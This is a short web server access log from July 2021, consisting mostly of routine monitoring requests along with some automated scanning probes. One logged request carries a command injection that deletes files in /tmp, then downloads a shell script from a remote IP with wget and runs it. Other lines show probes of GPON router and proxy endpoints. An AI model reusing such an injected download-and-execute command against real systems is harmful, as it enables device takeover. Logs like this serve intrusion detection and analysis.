212.91.246.72 - - [04/Jul/2021:09:11:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
205.185.120.237 - - [04/Jul/2021:09:12:29 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
212.91.246.72 - - [04/Jul/2021:09:12:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:09:13:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:09:14:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
195.68.203.186 - - [04/Jul/2021:09:15:13 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7"
212.91.246.72 - - [04/Jul/2021:09:15:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.45.210 - - [04/Jul/2021:09:16:49 +0200] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://176.123.9.117:35351/ttt.sh;sh+ttt.sh+jaws HTTP/1.1" 404 310 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36"
212.91.246.72 - - [04/Jul/2021:09:16:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
209.141.45.210 - - [04/Jul/2021:09:16:59 +0200] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 323 "-" "Mozilla/5.0 (X11; U; Linux x86_64; da-DK; rv:1.9.2.13) Gecko/20101206"
212.91.246.72 - - [04/Jul/2021:09:17:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:09:18:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [04/Jul/2021:09:19:57 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
158.51.126.242 - - [04/Jul/2021:09:20:27 +0200] "CONNECT httpbin.org:443 HTTP/1.1" 405 341 "-" "Go-http-client/1.1"
158.51.126.242 - - [04/Jul/2021:09:20:28 +0200] "CONNECT httpbin.org:443 HTTP/1.1" 405 341 "-" "Go-http-client/1.1"
205.185.120.237 - - [04/Jul/2021:09:20:31 +0200] "GET /config/getuser?index=0 HTTP/1.1" 404 319 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0"
